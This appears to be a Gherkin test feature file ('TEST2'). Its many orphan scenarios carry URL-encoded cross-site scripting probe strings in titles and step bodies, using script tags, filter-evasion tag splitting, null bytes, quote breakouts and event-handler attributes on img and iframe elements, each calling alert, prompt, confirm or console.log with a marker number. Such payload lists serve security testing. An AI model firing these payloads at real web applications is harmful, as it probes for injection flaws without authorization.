@xc
Feature: TEST2

  @ORPHAN
  Scenario: nEW
    TEST
    dtdt
    dhshd
    jgdcs
    

  @ORPHAN
  Scenario: %3cscript%3econsole%2elog(299792458)%3c%2fscript%3e
    test
    

  @ORPHAN
  Scenario: %3cscr%20ipt%3econsole%2elog(299792458)%3c%2fscr%20ipt%3e
    test
    

  @ORPHAN
  Scenario: %3cscr%20ipt%3eprompt(299792458)%3c%2fscr%20ipt%3e
    test
    

  @ORPHAN
  Scenario: %22%3e%3cscript%3ealert(299792458)%3c%2fscript%3e
    test
    

  @ORPHAN
  Scenario: %22%3e%3cscript%3econfirm(299792458)%3c%2fscript%3e
    test
    

  @ORPHAN
  Scenario: %22%3e%3cscript%3ealert(299792458)%3c%2fscript%3e%3c%22
    test
    

  @ORPHAN
  Scenario: %22%3e%3cscript%3econfirm(299792458)%3c%2fscript%3e%3c%22
    test
    

  @ORPHAN
  Scenario: '%3e%3cscript%3econsole%2elog(299792458)%3c%2fscript%3e
    test
    

  @ORPHAN
  Scenario: '%3e%3cscript%3econfirm(299792458)%3c%2fscript%3e
    test
    

  @ORPHAN
  Scenario: '%3e%3cscript%3eprompt(299792458)%3c%2fscript%3e
    test
    

  @ORPHAN
  Scenario: '%3e%3cscript%3econfirm(299792458)%3c%2fscript%3e%3c'
    test
    

  @ORPHAN
  Scenario: '%3e%3cscript%3eprompt(299792458)%3c%2fscript%3e%3c'
    test
    

  @ORPHAN
  Scenario: %3cSCRIPT%3econsole%2elog(299792458)%3b%3c%2fSCRIPT%3e
    test
    

  @ORPHAN
  Scenario: %3cSCRIPT%3eprompt(299792458)%3b%3c%2fSCRIPT%3e
    test
    

  @ORPHAN
  Scenario: %3cscri%3cscript%3ept%3ealert(299792458)%3b%3c%2fscr%3c%2fscript%3eipt%3e
    test
    

  @ORPHAN
  Scenario: %3cscri%3cscript%3ept%3eprompt(299792458)%3b%3c%2fscr%3c%2fscript%3eipt%3e
    test
    

  @ORPHAN
  Scenario: %3cSCRI%3cscript%3ePT%3econsole%2elog(299792458)%3b%3c%2fSCR%3c%2fscript%3eIPT%3e
    test
    

  @ORPHAN
  Scenario: %3cSCRI%3cscript%3ePT%3eprompt(299792458)%3b%3c%2fSCR%3c%2fscript%3eIPT%3e
    test
    

  @ORPHAN
  Scenario: %3cscri%3cscr%3cscript%3eipt%3ept%3ealert(299792458)%3b%3c%2fscr%3c%2fsc%3c%2fscript%3eript%3eipt%3e
    test
    

  @ORPHAN
  Scenario: %3cscri%3cscr%3cscript%3eipt%3ept%3econfirm(299792458)%3b%3c%2fscr%3c%2fsc%3c%2fscript%3eript%3eipt%3e
    test
    

  @ORPHAN
  Scenario: %22%3bconsole%2elog(299792458)%3b%22
    test
    

  @ORPHAN
  Scenario: %22%3bprompt(299792458)%3b%22
    test
    

  @ORPHAN
  Scenario: '%3bconsole%2elog(299792458)%3b'
    test
    

  @ORPHAN
  Scenario: '%3bprompt(299792458)%3b'
    test
    

  @ORPHAN
  Scenario: %3bconsole%2elog(299792458)%3b
    test
    

  @ORPHAN
  Scenario: %3bprompt(299792458)%3b
    test
    

  @ORPHAN
  Scenario: console%2elog(299792458)%3b
    test
    

  @ORPHAN
  Scenario: %3cSCR%00IPT%3ealert(299792458)%3c%2fSCR%00IPT%3e
    test
    

  @ORPHAN
  Scenario: %3cSCR%00IPT%3econsole%2elog(299792458)%3c%2fSCR%00IPT%3e
    test
    

  @ORPHAN
  Scenario: %3cSCR%00IPT%3econfirm(299792458)%3c%2fSCR%00IPT%3e
    test
    

  @ORPHAN
  Scenario: %5c%22%3balert(299792458)%3b%2f%2f
    test
    

  @ORPHAN
  Scenario: %5c%22%3bconfirm(299792458)%3b%2f%2f
    test
    

  @ORPHAN
  Scenario: %3cSTYLE%20TYPE%3d%22text%2fjavascript%22%3ealert(299792458)%3b%3c%2fSTYLE%3e
    test
    

  @ORPHAN
  Scenario: %3cSTYLE%20TYPE%3d%22text%2fjavascript%22%3econfirm(299792458)%3b%3c%2fSTYLE%3e
    test
    

  @ORPHAN
  Scenario: %3c%3cSCRIPT%3ealert(299792458)%2f%2f%3c%3c%2fSCRIPT%3e
    test
    

  @ORPHAN
  Scenario: %3c%3cSCRIPT%3eprompt(299792458)%2f%2f%3c%3c%2fSCRIPT%3e
    test
    

  @ORPHAN
  Scenario: %22onmouseout%3dalert(299792458)%20
    test
    

  @ORPHAN
  Scenario: %22onmouseover%3dalert(299792458)%20
    test
    

  @ORPHAN
  Scenario: %22onmouseout%3dconsole%2elog(299792458)%20
    test
    

  @ORPHAN
  Scenario: %22onmousemove%3dconfirm(299792458)%20
    test
    

  @ORPHAN
  Scenario: %22onmouseout%3dconfirm(299792458)%20
    test
    

  @ORPHAN
  Scenario: %22onmousemove%3dprompt(299792458)%20
    test
    

  @ORPHAN
  Scenario: %22onmouseout%3dprompt(299792458)%20
    test
    

  @ORPHAN
  Scenario: %3c%3cSCRIPT%3ealert(299792458)%2f%2f%3c%3c%2fSCRIPT%3e
    test
    

  @ORPHAN
  Scenario: %3c%3cSCRIPT%3econfirm(299792458)%2f%2f%3c%3c%2fSCRIPT%3e
    test
    

  @ORPHAN
  Scenario: %3c%3cSCRIPT%3eprompt(299792458)%2f%2f%3c%3c%2fSCRIPT%3e
    test
    

  @ORPHAN
  Scenario: %3cimg%20src%3d%221%22%20onerror%3d%22alert(299792458)%22%3e
    test
    

  @ORPHAN
  Scenario: %3cimg%20src%3d%221%22%20onerror%3d%22confirm(299792458)%22%3e
    test
    

  @ORPHAN
  Scenario: %3cimg%20src%3d'1'%20onerror%3d'alert(299792458)'
    test
    

  @ORPHAN
  Scenario: %3cimg%20src%3d'1'%20onerror%3d'console%2elog(299792458)'
    test
    

  @ORPHAN
  Scenario: %3cimg%20src%3d'1'%20onerror%3d'prompt(299792458)'
    test
    

  @ORPHAN
  Scenario: onerror%3d%22console%2elog(299792458)%22
    test
    

  @ORPHAN
  Scenario: onerror%3d%22prompt(299792458)%22
    test
    

  @ORPHAN
  Scenario: onerror%3d'console%2elog(299792458)'
    test
    

  @ORPHAN
  Scenario: onerror%3d'confirm(299792458)'
    test
    

  @ORPHAN
  Scenario: onload%3d%22console%2elog(299792458)%22
    test
    

  @ORPHAN
  Scenario: onload%3d%22prompt(299792458)%22
    test
    

  @ORPHAN
  Scenario: onload%3d'console%2elog(299792458)'
    test
    

  @ORPHAN
  Scenario: onload%3d'confirm(299792458)'
    test
    

  @ORPHAN
  Scenario: %3cIMG%20%22%22%22%3e%3cSCRIPT%3ealert(299792458)%3c%2fSCRIPT%3e%22%3e
    test
    

  @ORPHAN
  Scenario: %3cIMG%20%22%22%22%3e%3cSCRIPT%3econfirm(299792458)%3c%2fSCRIPT%3e%22%3e
    test
    

  @ORPHAN
  Scenario: %3cIMG%20'''%3e%3cSCRIPT%3ealert(299792458)%3c%2fSCRIPT%3e'%3e
    test
    

  @ORPHAN
  Scenario: %3cIMG%20'''%3e%3cSCRIPT%3econsole%2elog(299792458)%3c%2fSCRIPT%3e'%3e
    test
    

  @ORPHAN
  Scenario: %3cIMG%20'''%3e%3cSCRIPT%3eprompt(299792458)%3c%2fSCRIPT%3e'%3e
    test
    

  @ORPHAN
  Scenario: %22%22%22%3e%3cSCRIPT%3ealert(299792458)
    test
    

  @ORPHAN
  Scenario: %22%22%22%3e%3cSCRIPT%3econfirm(299792458)
    test
    

  @ORPHAN
  Scenario: '''%3e%3cSCRIPT%3ealert(299792458)'
    test
    

  @ORPHAN
  Scenario: '''%3e%3cSCRIPT%3econsole%2elog(299792458)'
    test
    

  @ORPHAN
  Scenario: '''%3e%3cSCRIPT%3eprompt(299792458)'
    test
    

  @ORPHAN
  Scenario: %3cIFRAME%20SRC%3d'f'%20onerror%3d%22alert(299792458)%22%3e%3c%2fIFRAME%3e
    test
    

  @ORPHAN
  Scenario: %3cIFRAME%20SRC%3d'f'%20onerror%3d%22confirm(299792458)%22%3e%3c%2fIFRAME%3e
    test
    

  @ORPHAN
  Scenario: %3cIFRAME%20SRC%3d'f'%20onerror%3d'alert(299792458)'%3e%3c%2fIFRAME%3e
    test
    

  @ORPHAN
  Scenario: %3cIFRAME%20SRC%3d'f'%20onerror%3d'console%2elog(299792458)'%3e%3c%2fIFRAME%3e
    test
    

  @ORPHAN
  Scenario: %3cIFRAME%20SRC%3d'f'%20onerror%3d'prompt(299792458)'%3e%3c%2fIFRAME%3e
    test
    

  @ORPHAN
  Scenario: testx
    %3cscript%3econfirm(299792458)%3c%2fscript%3e
    

  @ORPHAN
  Scenario: testx
    %3cscr%20ipt%3ealert(299792458)%3c%2fscr%20ipt%3e
    

  @ORPHAN
  Scenario: testx
    %3cscr%20ipt%3econfirm(299792458)%3c%2fscr%20ipt%3e
    

  @ORPHAN
  Scenario: testx
    %22%3e%3cscript%3ealert(299792458)%3c%2fscript%3e
    

  @ORPHAN
  Scenario: testx
    %22%3e%3cscript%3econfirm(299792458)%3c%2fscript%3e
    

  @ORPHAN
  Scenario: testx
    %22%3e%3cscript%3eprompt(299792458)%3c%2fscript%3e
    

  @ORPHAN
  Scenario: testx
    %22%3e%3cscript%3ealert(299792458)%3c%2fscript%3e%3c%22
    

  @ORPHAN
  Scenario: testx
    '%3e%3cscript%3ealert(299792458)%3c%2fscript%3e
    

  @ORPHAN
  Scenario: testx
    '%3e%3cscript%3econsole%2elog(299792458)%3c%2fscript%3e
    

  @ORPHAN
  Scenario: testx
    '%3e%3cscript%3eprompt(299792458)%3c%2fscript%3e
    

  @ORPHAN
  Scenario: testx
    '%3e%3cscript%3econsole%2elog(299792458)%3c%2fscript%3e%3c'
    

  @ORPHAN
  Scenario: testx
    '%3e%3cscript%3eprompt(299792458)%3c%2fscript%3e%3c'
    

  @ORPHAN
  Scenario: testx
    %3cSCRIPT%3ealert(299792458)%3b%3c%2fSCRIPT%3e
    

  @ORPHAN
  Scenario: testx
    %3cSCRIPT%3eprompt(299792458)%3b%3c%2fSCRIPT%3e
    

  @ORPHAN
  Scenario: testx
    %3cscri%3cscript%3ept%3econsole%2elog(299792458)%3b%3c%2fscr%3c%2fscript%3eipt%3e
    

  @ORPHAN
  Scenario: testx
    %3cscri%3cscript%3ept%3eprompt(299792458)%3b%3c%2fscr%3c%2fscript%3eipt%3e
    

  @ORPHAN
  Scenario: testx
    %3cSCRI%3cscript%3ePT%3ealert(299792458)%3b%3c%2fSCR%3c%2fscript%3eIPT%3e
    

  @ORPHAN
  Scenario: testx
    %3cSCRI%3cscript%3ePT%3eprompt(299792458)%3b%3c%2fSCR%3c%2fscript%3eIPT%3e
    

  @ORPHAN
  Scenario: testx
    %3cscri%3cscr%3cscript%3eipt%3ept%3econsole%2elog(299792458)%3b%3c%2fscr%3c%2fsc%3c%2fscript%3eript%3eipt%3e
    

  @ORPHAN
  Scenario: testx
    %3cscri%3cscr%3cscript%3eipt%3ept%3eprompt(299792458)%3b%3c%2fscr%3c%2fsc%3c%2fscript%3eript%3eipt%3e
    

  @ORPHAN
  Scenario: testx
    %22%3bconsole%2elog(299792458)%3b%22
    

  @ORPHAN
  Scenario: testx
    %22%3bprompt(299792458)%3b%22
    

  @ORPHAN
  Scenario: testx
    '%3bconsole%2elog(299792458)%3b'
    

  @ORPHAN
  Scenario: testx
    '%3bprompt(299792458)%3b'
    

  @ORPHAN
  Scenario: testx
    %3balert(299792458)%3b
    

  @ORPHAN
  Scenario: testx
    %3bprompt(299792458)%3b
    

  @ORPHAN
  Scenario: testx
    console%2elog(299792458)%3b
    

  @ORPHAN
  Scenario: testx
    prompt(299792458)%3b
    

  @ORPHAN
  Scenario: testx
    %3cSCR%00IPT%3econsole%2elog(299792458)%3c%2fSCR%00IPT%3e
    

  @ORPHAN
  Scenario: testx
    %5c%22%3balert(299792458)%3b%2f%2f
    

  @ORPHAN
  Scenario: testx
    %5c%22%3bconsole%2elog(299792458)%3b%2f%2f
    

  @ORPHAN
  Scenario: testx
    %5c%22%3bprompt(299792458)%3b%2f%2f
    

  @ORPHAN
  Scenario: testx
    %3cSTYLE%20TYPE%3d%22text%2fjavascript%22%3econsole%2elog(299792458)%3b%3c%2fSTYLE%3e
    

  @ORPHAN
  Scenario: testx
    %3cSTYLE%20TYPE%3d%22text%2fjavascript%22%3econfirm(299792458)%3b%3c%2fSTYLE%3e
    

  @ORPHAN
  Scenario: testx
    %3c%3cSCRIPT%3ealert(299792458)%2f%2f%3c%3c%2fSCRIPT%3e
    

  @ORPHAN
  Scenario: testx
    %3c%3cSCRIPT%3econfirm(299792458)%2f%2f%3c%3c%2fSCRIPT%3e
    

  @ORPHAN
  Scenario: testx
    %3c%3cSCRIPT%3eprompt(299792458)%2f%2f%3c%3c%2fSCRIPT%3e
    

  @ORPHAN
  Scenario: testx
    %22onmouseout%3dalert(299792458)%20
    

  @ORPHAN
  Scenario: testx
    %22onmousemove%3dconsole%2elog(299792458)%20
    

  @ORPHAN
  Scenario: testx
    %22onmouseout%3dconsole%2elog(299792458)%20
    

  @ORPHAN
  Scenario: testx
    %22onmouseout%3dconfirm(299792458)%20
    

  @ORPHAN
  Scenario: testx
    %22onmouseover%3dconfirm(299792458)%20
    

  @ORPHAN
  Scenario: testx
    %3c%3cSCRIPT%3ealert(299792458)%2f%2f%3c%3c%2fSCRIPT%3e
    

  @ORPHAN
  Scenario: testx
    %3c%3cSCRIPT%3econfirm(299792458)%2f%2f%3c%3c%2fSCRIPT%3e
    

  @ORPHAN
  Scenario: testx
    %3c%3cSCRIPT%3eprompt(299792458)%2f%2f%3c%3c%2fSCRIPT%3e
    

  @ORPHAN
  Scenario: testx
    %3cimg%20src%3d%221%22%20onerror%3d%22console%2elog(299792458)%22%3e
    

  @ORPHAN
  Scenario: testx
    %3cimg%20src%3d%221%22%20onerror%3d%22prompt(299792458)%22%3e
    

  @ORPHAN
  Scenario: testx
    %3cimg%20src%3d'1'%20onerror%3d'console%2elog(299792458)'
    

  @ORPHAN
  Scenario: testx
    %3cimg%20src%3d'1'%20onerror%3d'confirm(299792458)'
    

  @ORPHAN
  Scenario: testx
    onerror%3d%22alert(299792458)%22
    

  @ORPHAN
  Scenario: testx
    onerror%3d%22console%2elog(299792458)%22
    

  @ORPHAN
  Scenario: testx
    onerror%3d'alert(299792458)'
    

  @ORPHAN
  Scenario: testx
    onerror%3d'console%2elog(299792458)'
    

  @ORPHAN
  Scenario: testx
    onerror%3d'confirm(299792458)'
    

  @ORPHAN
  Scenario: testx
    onload%3d%22console%2elog(299792458)%22
    

  @ORPHAN
  Scenario: testx
    onload%3d%22confirm(299792458)%22
    

  @ORPHAN
  Scenario: testx
    onload%3d'console%2elog(299792458)'
    

  @ORPHAN
  Scenario: testx
    %3cIMG%20%22%22%22%3e%3cSCRIPT%3ealert(299792458)%3c%2fSCRIPT%3e%22%3e
    

  @ORPHAN
  Scenario: testx
    %3cIMG%20%22%22%22%3e%3cSCRIPT%3eprompt(299792458)%3c%2fSCRIPT%3e%22%3e
    

  @ORPHAN
  Scenario: testx
    %3cIMG%20'''%3e%3cSCRIPT%3ealert(299792458)%3c%2fSCRIPT%3e'%3e
    

  @ORPHAN
  Scenario: testx
    %3cIMG%20'''%3e%3cSCRIPT%3eprompt(299792458)%3c%2fSCRIPT%3e'%3e
    

  @ORPHAN
  Scenario: testx
    %22%22%22%3e%3cSCRIPT%3ealert(299792458)
    

  @ORPHAN
  Scenario: testx
    %22%22%22%3e%3cSCRIPT%3econsole%2elog(299792458)
    

  @ORPHAN
  Scenario: testx
    %22%22%22%3e%3cSCRIPT%3eprompt(299792458)
    

  @ORPHAN
  Scenario: testx
    '''%3e%3cSCRIPT%3econfirm(299792458)'
    

  @ORPHAN
  Scenario: testx
    %3cIFRAME%20SRC%3d'f'%20onerror%3d%22console%2elog(299792458)%22%3e%3c%2fIFRAME%3e
    

  @ORPHAN
  Scenario: testx
    %3cIFRAME%20SRC%3d'f'%20onerror%3d%22prompt(299792458)%22%3e%3c%2fIFRAME%3e
    

  @ORPHAN
  Scenario: testx
    %3cIFRAME%20SRC%3d'f'%20onerror%3d'console%2elog(299792458)'%3e%3c%2fIFRAME%3e
    

  @ORPHAN
  Scenario: testx
    %3cIFRAME%20SRC%3d'f'%20onerror%3d'prompt(299792458)'%3e%3c%2fIFRAME%3e
